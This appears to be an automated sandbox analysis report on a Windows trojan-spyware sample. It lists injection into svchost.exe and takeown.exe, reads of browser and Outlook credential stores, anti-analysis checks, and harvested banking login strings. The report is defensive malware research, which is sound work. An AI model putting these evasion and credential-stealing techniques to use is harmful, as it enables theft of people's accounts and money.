                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FFA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00FFA1EF
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FE8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00FE8310
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FF51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00FF51BD
                Source: C:\Windows\SysWOW64\takeown.exe | Code function: String function: 0372EA12 appears 86 times
                Source: C:\Windows\SysWOW64\takeown.exe | Code function: String function: 0373F290 appears 105 times
                Source: C:\Windows\SysWOW64\takeown.exe | Code function: String function: 03707E54 appears 110 times
                Source: C:\Windows\SysWOW64\takeown.exe | Code function: String function: 036F5130 appears 58 times
                Source: C:\Windows\SysWOW64\takeown.exe | Code function: String function: 036AB970 appears 250 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03187E54 appears 101 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0312B970 appears 248 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03175130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 031BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 031AEA12 appears 86 times
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: String function: 00F97DE1 appears 35 times
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: String function: 00FB0AE3 appears 70 times
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: String function: 00FB8900 appears 42 times
                Source: arGdXDmyGJ.exe, 00000000.00000003.1233847744.0000000004183000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs arGdXDmyGJ.exe
                Source: arGdXDmyGJ.exe, 00000000.00000003.1232512778.000000000432D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs arGdXDmyGJ.exe
                Source: arGdXDmyGJ.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/5@7/7
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: 0_2_00FFA06A GetLastError,FormatMessageW
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: 0_2_00FE81CB AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: 0_2_00FE87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: 0_2_00FFB3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: 0_2_0100EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: 0_2_010083BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: 0_2_00F94E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | File created: C:\Users\user\AppData\Local\Temp\aut9AC4.tmp
                Source: arGdXDmyGJ.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: takeown.exe, 0000000A.00000003.1613131159.0000000003025000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3702052200.0000000003051000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3702052200.0000000003004000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3702052200.0000000003025000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000003.1620635378.000000000302F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: arGdXDmyGJ.exe | Virustotal: Detection: 74%
                Source: arGdXDmyGJ.exe | ReversingLabs: Detection: 68%
                Source: unknown | Process created: C:\Users\user\Desktop\arGdXDmyGJ.exe "C:\Users\user\Desktop\arGdXDmyGJ.exe"
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\arGdXDmyGJ.exe"
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe | Process created: C:\Windows\SysWOW64\takeown.exe "C:\Windows\SysWOW64\takeown.exe"
                Source: C:\Windows\SysWOW64\takeown.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\takeown.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                Source: C:\Windows\SysWOW64\takeown.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: arGdXDmyGJ.exe | Static file information: File size 1224192 > 1048576
                Source: arGdXDmyGJ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: arGdXDmyGJ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: arGdXDmyGJ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: arGdXDmyGJ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: arGdXDmyGJ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: arGdXDmyGJ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: arGdXDmyGJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: takeown.pdbGCTL source: svchost.exe, 00000002.00000003.1392680906.0000000002A26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1391395201.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1392668149.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 00000009.00000002.3703008425.000000000135E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: arGdXDmyGJ.exe, 00000000.00000003.1232120246.0000000004200000.00000004.00001000.00020000.00000000.sdmp, arGdXDmyGJ.exe, 00000000.00000003.1233120508.0000000004060000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1423720111.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1423720111.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1330139854.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1328248098.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000003.1423717679.000000000331F000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3703920004.0000000003680000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3703920004.000000000381E000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000A.00000003.1426108573.00000000034CB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: takeown.pdb source: svchost.exe, 00000002.00000003.1392680906.0000000002A26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1391395201.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1392668149.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 00000009.00000002.3703008425.000000000135E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: arGdXDmyGJ.exe, 00000000.00000003.1232120246.0000000004200000.00000004.00001000.00020000.00000000.sdmp, arGdXDmyGJ.exe, 00000000.00000003.1233120508.0000000004060000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1423720111.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1423720111.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1330139854.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1328248098.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, takeown.exe, 0000000A.00000003.1423717679.000000000331F000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3703920004.0000000003680000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3703920004.000000000381E000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000A.00000003.1426108573.00000000034CB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: takeown.exe, 0000000A.00000002.3702052200.0000000002F9E000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3704350785.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 0000000C.00000002.3704031711.000000000264C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1736983581.0000000037F3C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: takeown.exe, 0000000A.00000002.3702052200.0000000002F9E000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3704350785.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 0000000C.00000002.3704031711.000000000264C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1736983581.0000000037F3C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DKwZ8oxmXrzaXEMk9aGP.exe, 00000009.00000002.3702330015.0000000000F3F000.00000002.00000001.01000000.00000005.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 0000000C.00000000.1492047890.0000000000F3F000.00000002.00000001.01000000.00000005.sdmp
                Source: arGdXDmyGJ.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: arGdXDmyGJ.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: arGdXDmyGJ.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: arGdXDmyGJ.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: arGdXDmyGJ.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: 0_2_00F94B37 LoadLibraryA,GetProcAddress, 0_2_00F94B37
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: 0_2_00FB8945 push ecx; ret 0_2_00FB8958
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418800 push ebx; ret 2_2_00418805
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A10F push edi; iretd 2_2_0041A11E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A113 push edi; iretd 2_2_0041A11E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00408138 push es; ret 2_2_00408139
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A1C6 push edi; iretd 2_2_0041A1C7
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004139B1 push esp; ret 2_2_00413A0A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00413A8F push es; iretd 2_2_00413A9E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401430 push ds; retf 2_2_004014D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040154E push esi; iretd 2_2_00401557
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004015BF push ds; retf 2_2_00401600
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A6EB push cs; ret 2_2_0041A6EC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041EF2A push edi; iretd 2_2_0041EF2D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402FF0 push eax; ret 2_2_00402FF2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031309AD push ecx; mov dword ptr [esp], ecx 2_2_031309B6
                Source: C:\Windows\SysWOW64\takeown.exe | Code function: 10_2_0368225F pushad ; ret 10_2_036827F9
                Source: C:\Windows\SysWOW64\takeown.exe | Code function: 10_2_036827FA pushad ; ret 10_2_036827F9
                Source: C:\Windows\SysWOW64\takeown.exe | Code function: 10_2_036B09AD push ecx; mov dword ptr [esp], ecx 10_2_036B09B6
                Source: C:\Windows\SysWOW64\takeown.exe | Code function: 10_2_0368283D push eax; iretd 10_2_03682858
                Source: C:\Windows\SysWOW64\takeown.exe | Code function: 10_2_0368135E push eax; iretd 10_2_03681369
                Source: C:\Windows\SysWOW64\takeown.exe | Code function: 10_2_02F10A9C push es; iretd 10_2_02F10AAB
                Source: C:\Windows\SysWOW64\takeown.exe | Code function: 10_2_02F20A7F push esi; retf 10_2_02F20A8F
                Source: C:\Windows\SysWOW64\takeown.exe | Code function: 10_2_02F20BFF push esp; iretd 10_2_02F20C00
                Source: C:\Windows\SysWOW64\takeown.exe | Code function: 10_2_02F109BE push esp; ret 10_2_02F10A17
                Source: C:\Windows\SysWOW64\takeown.exe | Code function: 10_2_02F15060 push eax; retf 10_2_02F15061
                Source: C:\Windows\SysWOW64\takeown.exe | Code function: 10_2_02F171D3 push edi; iretd 10_2_02F171D4
                Source: C:\Windows\SysWOW64\takeown.exe | Code function: 10_2_02F05145 push es; ret 10_2_02F05146
                Source: C:\Windows\SysWOW64\takeown.exe | Code function: 10_2_02F17120 push edi; iretd 10_2_02F1712B
                Source: C:\Windows\SysWOW64\takeown.exe | Code function: 10_2_02F1711C push edi; iretd 10_2_02F1712B
                Source: C:\Windows\SysWOW64\takeown.exe | Code function: 10_2_02F176F8 push cs; ret 10_2_02F176F9
                Source: C:\Windows\SysWOW64\takeown.exe | Code function: 10_2_02F21420 push ecx; iretd 10_2_02F21426
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: 0_2_00F948D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00F948D7
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: 0_2_01015376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_01015376
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FB3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FB3187
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\takeown.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\takeown.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\takeown.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\takeown.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\takeown.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | API/Special instruction interceptor: Address: 1153274
                Source: C:\Windows\SysWOW64\takeown.exe | API/Special instruction interceptor: Address: 7FF9105CD324
                Source: C:\Windows\SysWOW64\takeown.exe | API/Special instruction interceptor: Address: 7FF9105CD7E4
                Source: C:\Windows\SysWOW64\takeown.exe | API/Special instruction interceptor: Address: 7FF9105CD944
                Source: C:\Windows\SysWOW64\takeown.exe | API/Special instruction interceptor: Address: 7FF9105CD504
                Source: C:\Windows\SysWOW64\takeown.exe | API/Special instruction interceptor: Address: 7FF9105CD544
                Source: C:\Windows\SysWOW64\takeown.exe | API/Special instruction interceptor: Address: 7FF9105CD1E4
                Source: C:\Windows\SysWOW64\takeown.exe | API/Special instruction interceptor: Address: 7FF9105D0154
                Source: C:\Windows\SysWOW64\takeown.exe | API/Special instruction interceptor: Address: 7FF9105CDA44
                Source: arGdXDmyGJ.exe, 00000000.00000002.1235183286.0000000001A73000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FIDDLER.EXE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0317096E rdtsc 2_2_0317096E
                Source: C:\Windows\SysWOW64\takeown.exe | Window / User API: threadDelayed 9834
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-105132
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | API coverage: 4.7 %
                Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\takeown.exe | API coverage: 2.7 %
                Source: C:\Windows\SysWOW64\takeown.exe TID: 7312 | Thread sleep count: 137 > 30
                Source: C:\Windows\SysWOW64\takeown.exe TID: 7312 | Thread sleep time: -274000s >= -30000s
                Source: C:\Windows\SysWOW64\takeown.exe TID: 7312 | Thread sleep count: 9834 > 30
                Source: C:\Windows\SysWOW64\takeown.exe TID: 7312 | Thread sleep time: -19668000s >= -30000s
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe TID: 7328 | Thread sleep time: -35000s >= -30000s
                Source: C:\Windows\SysWOW64\takeown.exe | Last function: Thread delayed
                Source: C:\Windows\SysWOW64\takeown.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: 0_2_00FF445A GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00FF445A
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: 0_2_00FFC6D1 FindFirstFileW,FindClose, 0_2_00FFC6D1
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: 0_2_00FFC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00FFC75C
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: 0_2_00FFEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00FFEF95
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: 0_2_00FFF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00FFF0F2
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: 0_2_00FFF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00FFF3F3
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: 0_2_00FF37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00FF37EF
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: 0_2_00FF3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00FF3B12
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: 0_2_00FFBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00FFBCBC
                Source: C:\Windows\SysWOW64\takeown.exe | Code function: 10_2_02F1C380 FindFirstFileW,FindNextFileW,FindClose, 10_2_02F1C380
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: 0_2_00F949A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00F949A0
                Source: 1f2Wt16K.10.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: 1f2Wt16K.10.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: 1f2Wt16K.10.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: 1f2Wt16K.10.dr | Binary or memory string: discord.comVMware20,11696487552f
                Source: 1f2Wt16K.10.dr | Binary or memory string: bankofamerica.comVMware20,11696487552x
                Source: 1f2Wt16K.10.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: 1f2Wt16K.10.dr | Binary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: 1f2Wt16K.10.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: 1f2Wt16K.10.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: 1f2Wt16K.10.dr | Binary or memory string: global block list test formVMware20,11696487552
                Source: 1f2Wt16K.10.dr | Binary or memory string: tasks.office.comVMware20,11696487552o
                Source: firefox.exe, 0000000D.00000002.1739284591.0000023637FEC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 1f2Wt16K.10.dr | Binary or memory string: AMC password management pageVMware20,11696487552
                Source: takeown.exe, 0000000A.00000002.3702052200.0000000002F9E000.00000004.00000020.00020000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 0000000C.00000002.3702819143.00000000005D9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 1f2Wt16K.10.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: 1f2Wt16K.10.dr | Binary or memory string: interactivebrokers.comVMware20,11696487552
                Source: 1f2Wt16K.10.dr | Binary or memory string: dev.azure.comVMware20,11696487552j
                Source: 1f2Wt16K.10.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: 1f2Wt16K.10.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: 1f2Wt16K.10.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
